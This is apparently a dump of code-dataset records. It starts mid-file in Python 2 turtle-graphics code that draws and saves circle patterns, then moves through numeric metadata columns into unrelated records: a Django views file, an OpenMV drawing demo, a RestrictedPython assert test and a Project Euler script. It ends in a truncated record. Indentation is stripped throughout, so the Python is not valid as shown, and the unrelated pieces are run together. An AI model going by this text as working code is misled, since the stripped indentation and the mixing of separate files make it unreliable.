totalbefore=len(masterCircleSet)
totalafter=0
newlist=[]
counter=0
#print totalbefore
while((totalbefore!=totalafter) and (len(masterCircleSet)<750)):
#print (circlecalled, checkcirclescalled)
#print totalbefore, totalafter
#raw_input()
print len(masterCircleSet)
totalbefore=len(masterCircleSet)
for firstCircleplace in range(counter,len(circlelist)):
firstCircle=circlelist[firstCircleplace]
for secondCircleplace in range(len(circlelist)):
secondCircle=circlelist[secondCircleplace]
newCircles=checkCircles(firstCircle, secondCircle)
#print newCircles, len(newlist)
#raw_input((totalbefore,totalafter))
if newCircles:
if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,diameter) not in masterCircleSet):
newlist.append(Circle(newCircles[0][0], newCircles[0][1], diameter,lm))
else:
print newCircles[0]
if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,diameter) not in masterCircleSet):
newlist.append(Circle(newCircles[1][0], newCircles[1][1], diameter,lm))
else:
print newCircles[1]
counter=len(circlelist)
for item in newlist:
item.draw()
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
lm.tracer(True)
a.lm.tracer(True)
fvh2.savetocircles(a.lm)
def createanotherdrawing(startSize):
a=Circle(0,0,startSize)
smallestsize=startSize
a.addCardinals()
a.lm.undo()
a.lm.undo()
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
circlelist.append(eachitem)
eachitem.lm.undo()
eachitem.lm.undo()
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
for secondCircle in circlelist:
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2
if (thisDiameter<=1):
#print "first break"
break
if thisDiameter<smallestsize:
smallestsize=thisDiameter
print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter)
newCircle.draw()
circlelist.append(newCircle)
#for eachCard in newCircle.cardinals:
#circlelist.append(eachCard)
#if (thisDiameter<=1):
#print "second break"
for item in newlist:
circlelist.append(item)
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
fvh2.savetocircles(a.lm)
def yetanotherdrawing(startdiameter,numberofoutsidecircles):
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm)
a.lm.undo()
a.lm.undo()
a.differentcards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
eachitem.lm.undo()
eachitem.lm.undo()
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
print "new firstCircle : " + str(firstCircle.checkString)
print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
if (thisDiameter<=1):
#print "first break"
#secondCircle.draw()
break
if thisDiameter<smallestsize:
smallestsize=thisDiameter
print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
#newCircle.realCards()
circlelist.append(newCircle)
#for eachCard in newCircle.realcards:
# circlelist.append(eachCard)
#secondCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
for acircle in circlelist:
acircle.draw()
lm.tracer(True)
fvh2.savetocircles(a.lm)
def yetanotherdrawingagain(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
global masterCircleSet
masterCircleSet=set()
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm)
# a.lm.undo()
# a.lm.undo()
a.differentcards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
#eachitem.lm.undo()
#eachitem.lm.undo()
eachitem.differentcards(numberofoutsidecircles)
for subitem in eachitem.cardinals:
#subitem.lm.undo()
#subitem.lm.undo()
circlelist.append(subitem)
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
#print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
#print "new firstCircle : " + str(firstCircle.checkString)
#print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
if (min(firstCircle.radius, secondCircle.radius)<=1):
#print "first break"
#secondCircle.draw()
break
if thisDiameter<smallestsize:
smallestsize=thisDiameter
#print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
newlist.append(newCircle)
if recursive:
newCircle.differentcards(numberofoutsidecircles)
for eachCard in newCircle.cardinals:
circlelist.append(eachCard)
#secondCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
item.draw()
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
lm.tracer(True)
fvh2.savetocircles(a.lm)
def yetanotherdrawingagainwithmax(startdiameter,numberofoutsidecircles, recursive=False, lm=None,stepsize=2):
global masterCircleSet
masterCircleSet=set()
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm,False)
# a.lm.undo()
# a.lm.undo()
a.differentcards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
#eachitem.lm.undo()
#eachitem.lm.undo()
eachitem.differentcards(numberofoutsidecircles)
for subitem in eachitem.cardinals:
#subitem.lm.undo()
#subitem.lm.undo()
circlelist.append(subitem)
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
# print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
#print "new firstCircle : " + str(firstCircle.checkString)
#print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#firstCircle.drawred()
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/float(stepsize)
if (min(firstCircle.radius, secondCircle.radius)<=1):
#print "first break"
#secondCircle.draw()
break
if thisDiameter<smallestsize:
smallestsize=thisDiameter
#print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
newCircle.draw()
circlelist.append(newCircle)
if recursive:
newCircle.differentcards(numberofoutsidecircles)
for eachCard in newCircle.cardinals:
eachCard.draw()
circlelist.append(eachCard)
#secondCircle.draw()
#firstCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
lm.tracer(True)
fvh2.savetocircles(a.lm)
def yadwm(startdiameter):
smallestsize=startdiameter
a=Circle(0,0,startdiameter)
a.addCardinals()
a.lm.undo()
a.lm.undo()
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
eachitem.lm.undo()
eachitem.lm.undo()
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
for secondCircle in circlelist:
thisDiameter=max(firstCircle.radius, secondCircle.radius)/2.0
if (thisDiameter<=32):
#print "first break"
break
if thisDiameter<smallestsize:
smallestsize=thisDiameter
print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
#lm.tracer(False)
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter)
newCircle.addCardinals()
newCircle.draw()
circlelist.append(newCircle)
for eachCard in newCircle.cardinals:
eachCard.draw()
circlelist.append(eachCard)
#lm.tracer(True)
#if (thisDiameter<=1):
#print "second break"
for item in newlist:
circlelist.append(item)
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
fvh2.savetocircles(a.lm)
def makeart1():
for size in range(7,11):
for numberofsides in range(1,10):
for recursive in (False, True):
print 2**size,numberofsides,recursive
lm=fvh2.fvh.MyTurtle()
ts=lm.getscreen()
ts.screensize(2**(size+2),2**(size+2),'grey50')
ts.setup(2**(size+3),2**(size+3),0,0)
yetanotherdrawingagain(2**size,numberofsides,recursive,lm)
tc=ts.getcanvas()
filename="circles/startSize"+str(size)+"numberofsides"+str(numberofsides)+str(recursive)+'.eps'
ts.update()
tc.postscript(file=filename, height=2**(size+2), width=2**(size+2),x=-2**(size+1),y=-2**(size+1))
ts.bye()
def makeart2():
for size in range(8,11):
for numberofsides in range(6,10):
for recursive in (False, True):
for stepsize in range(2,4):
print stepsize**size,numberofsides,recursive
lm=fvh2.fvh.MyTurtle()
ts=lm.getscreen()
ts.screensize(stepsize**(size+2),stepsize**(size+2),'grey50')
ts.setup(stepsize**(size+3),stepsize**(size+3),0,0)
yetanotherdrawingagainwithmax(stepsize**size,numberofsides,recursive,lm,stepsize)
tc=ts.getcanvas()
filename="circles/max"+str(size)+str(numberofsides)+str(recursive)+'.eps'
tc.postscript(file=filename, height=stepsize**(size+2), width=stepsize**(size+2),x=-stepsize**(size+1),y=-stepsize**(size+1))
ts.bye()
def yetanotherdrawingagainwithcontinue(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
global masterCircleSet
masterCircleSet=set()
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm)
a.draw()
a.lm.undo()
a.lm.undo()
a.differentcards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
eachitem.draw()
eachitem.lm.undo()
eachitem.lm.undo()
#eachitem.draw()
eachitem.differentcards(numberofoutsidecircles)
for subitem in eachitem.cardinals:
subitem.draw()
subitem.lm.undo()
subitem.lm.undo()
circlelist.append(subitem)
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
#print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
#print "new firstCircle : " + str(firstCircle.checkString)
#print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
if (min(firstCircle.radius, secondCircle.radius)<=4):
#print "first break"
#secondCircle.draw()
continue
if thisDiameter<smallestsize:
smallestsize=thisDiameter
#print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
newCircle.draw()
newlist.append(newCircle)
if recursive:
newCircle.differentcards(numberofoutsidecircles)
for eachCard in newCircle.cardinals:
eachCard.draw()
circlelist.append(eachCard)
#secondCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
lm.tracer(True)
fvh2.savetocircles(a.lm)
def yetanotherdrawingagainwithcontinueandextended(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
global masterCircleSet
masterCircleSet=set()
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm)
# a.lm.undo()
# a.lm.undo()
a.extendedCards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
for eachitem in a.cardinals:
#eachitem.lm.undo()
#eachitem.lm.undo()
#eachitem.differentcards(numberofoutsidecircles)
#for subitem in eachitem.cardinals:
#subitem.lm.undo()
#subitem.lm.undo()
#circlelist.append(subitem)
circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
#print "new firstCircle : " + str(firstCircle.checkString)
#print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
if (min(firstCircle.radius, secondCircle.radius)<=4):
#print "first break"
#secondCircle.draw()
continue
if thisDiameter<smallestsize:
smallestsize=thisDiameter
#print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
newlist.append(newCircle)
if recursive:
newCircle.extendedCards(numberofoutsidecircles)
for eachCard in newCircle.cardinals:
circlelist.append(eachCard)
#secondCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
fvh2.savetocircles(a.lm)
return circlelist
def yadei(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
global masterCircleSet
masterCircleSet=set()
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
smallestsize=startdiameter
a=Circle(0,0,startdiameter,lm)
# a.lm.undo()
# a.lm.undo()
a.innerextendedCards(numberofoutsidecircles)
circlelist=[]
circlelist.append(a)
#for eachitem in a.cardinals:
#eachitem.lm.undo()
#eachitem.lm.undo()
#eachitem.differentcards(numberofoutsidecircles)
#for subitem in eachitem.cardinals:
#subitem.lm.undo()
#subitem.lm.undo()
#circlelist.append(subitem)
#circlelist.append(eachitem)
totalbefore=len(masterCircleSet)
totalafter=0
while ((totalbefore!=totalafter)):
print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
totalbefore=len(masterCircleSet)
newlist=[]
for firstCircle in circlelist:
#print "new firstCircle : " + str(firstCircle.checkString)
#print "Current number of circles in circlelist: "+str(len(circlelist))
#firstCircle.drawred()
for secondCircle in circlelist:
#secondCircle.drawred()
thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
if (min(firstCircle.radius, secondCircle.radius)<=4):
#print "first break"
#secondCircle.draw()
continue
if thisDiameter<smallestsize:
smallestsize=thisDiameter
#print "New Smallest Size: "+ str(smallestsize)
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
for x in newCircles:
if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
newCircle=Circle(x[0], x[1],thisDiameter,lm)
newlist.append(newCircle)
if recursive:
newCircle.innerextendedCards(numberofoutsidecircles)
for eachCard in newCircle.cardinals:
circlelist.append(eachCard)
#secondCircle.draw()
#if (thisDiameter<=1):
#print "second break"
#firstCircle.draw()
for item in newlist:
circlelist.append(item)
newlist=[]
totalafter=len(masterCircleSet)
if (totalafter==totalbefore):
print "no more moves"
fvh2.savetocircles(a.lm)
return circlelist
def itsOct():
pass
| 34.130264
| 257
| 0.662697
| 3,790
| 34,847
| 6.090501
| 0.065699
| 0.035351
| 0.022614
| 0.02426
| 0.871334
| 0.850583
| 0.830221
| 0.819261
| 0.80947
| 0.804402
| 0
| 0.016261
| 0.216461
| 34,847
| 1,020
| 258
| 34.163725
| 0.829146
| 0.112262
| 0
| 0.799197
| 0
| 0
| 0.030815
| 0.004493
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.001339
| 0.004016
| null | null | 0.03079
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9830fcb857d526b4820441836a1d74c1992e4612
| 171
|
py
|
Python
|
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def HomeView(request):
return render(request , 'site_home.html')
def AboutView(request):
return render(request, 'about.html')
| 24.428571
| 45
| 0.748538
| 22
| 171
| 5.772727
| 0.636364
| 0.204724
| 0.299213
| 0.409449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 171
| 7
| 46
| 24.428571
| 0.863946
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
983f4f7294d1c45f6ca7de2184dcf0e247274760
| 5,438
|
py
|
Python
|
usr/examples/03-Drawing/crazy_drawing.py
|
SSSnow/MDV3
|
5f21f9bbc04bccc1c060cebd74a4e1781c10aa00
|
[
"MIT"
] | 6
|
2017-05-24T06:51:37.000Z
|
2020-07-04T16:36:29.000Z
|
usr/examples/03-Drawing/crazy_drawing.py
|
Killercotton/OpenMV_OV7670
|
c4130052fc6e0f2eed2089222b3b1f2573c9825f
|
[
"MIT"
] | null | null | null |
usr/examples/03-Drawing/crazy_drawing.py
|
Killercotton/OpenMV_OV7670
|
c4130052fc6e0f2eed2089222b3b1f2573c9825f
|
[
"MIT"
] | 1
|
2019-10-21T11:08:37.000Z
|
2019-10-21T11:08:37.000Z
|
# Crazy Drawing Example
#
# This example shows off your OpenMV Cam's built-in drawing capabilities. This
# example was originally a test but serves as good reference code. Please put
# your IDE into non-JPEG mode to see the best drawing quality.
import pyb, sensor, image, math
sensor.reset()
sensor.set_framesize(sensor.QVGA)
while(True):
# Test Set Pixel
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.set_pixel(x, y, 255)
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.set_pixel(x, y, (255, 255, 255))
# Test Draw Line
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x0 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y0 = (pyb.rng() % (2*img.height())) - (img.height()//2)
x1 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y1 = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_line([x0, y0, x1, y1])
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x0 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y0 = (pyb.rng() % (2*img.height())) - (img.height()//2)
x1 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y1 = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_line([x0, y0, x1, y1])
# Test Draw Rectangle
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
w = (pyb.rng() % img.width())
h = (pyb.rng() % img.height())
img.draw_rectangle([x, y, w, h])
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
w = (pyb.rng() % img.width())
h = (pyb.rng() % img.height())
img.draw_rectangle([x, y, w, h])
# Test Draw Circle
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
r = (pyb.rng() % (img.width() if (img.width() > img.height()) else img.height()))
img.draw_circle(x, y, r)
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
r = (pyb.rng() % (img.width() if (img.width() > img.height()) else img.height()))
img.draw_circle(x, y, r)
# Test Draw String
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_string(x, y, "Hello\nWorld!")
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_string(x, y, "Hello\nWorld!")
# Test Draw Cross
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_cross(x, y)
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
img.draw_cross(x, y)
# Test Draw Keypoints
sensor.set_pixformat(sensor.GRAYSCALE)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
a = (pyb.rng() % (2*math.pi))
img.draw_keypoints([(x, y, a)])
sensor.set_pixformat(sensor.RGB565)
for i in range(10):
img = sensor.snapshot()
for j in range(100):
x = (pyb.rng() % (2*img.width())) - (img.width()//2)
y = (pyb.rng() % (2*img.height())) - (img.height()//2)
a = (pyb.rng() % (2*math.pi))
img.draw_keypoints([(x, y, a)])
| 39.985294
| 93
| 0.503678
| 764
| 5,438
| 3.54712
| 0.109948
| 0.088561
| 0.087823
| 0.118081
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0
| 0.048077
| 0.292387
| 5,438
| 135
| 94
| 40.281481
| 0.656185
| 0.065281
| 0
| 0.947368
| 0
| 0
| 0.005128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008772
| 0
| 0.008772
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
984cb898e2851daa433e2e4dd369d4cf167238af
| 170
|
py
|
Python
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 236
|
2015-01-03T17:14:53.000Z
|
2022-03-01T15:52:46.000Z
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 149
|
2016-10-24T06:56:44.000Z
|
2022-02-24T08:09:10.000Z
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 30
|
2015-04-03T05:38:13.000Z
|
2021-11-10T05:13:38.000Z
|
from tests.helper import restricted_exec
def test_RestrictingNodeTransformer__visit_Assert__1():
"""It allows assert statements."""
restricted_exec('assert 1')
| 24.285714
| 55
| 0.782353
| 20
| 170
| 6.25
| 0.75
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013514
| 0.129412
| 170
| 6
| 56
| 28.333333
| 0.831081
| 0.164706
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
98793af1d2a1730aeaf0a67933baaa6757991887
| 1,357
|
py
|
Python
|
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 18 10:36:17 2019
@author: tuyenta
"""
s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
largestProduct = 0
for i in range(0, len(s) - 13):
product = 1
for j in range(i, i + 13):
product *= int(s[j: j + 1])
if product > largestProduct:
largestProduct = product
print (largestProduct)
| 61.681818
| 1,006
| 0.884304
| 52
| 1,357
| 23.076923
| 0.653846
| 0.011667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.814992
| 0.075903
| 1,357
| 22
| 1,007
| 61.681818
| 0.141946
| 0.071481
| 0
| 0
| 0
| 0
| 0.798722
| 0.798722
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f3456525e16a28ff65bdae2bcdeda6075e74b3f
| 343
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
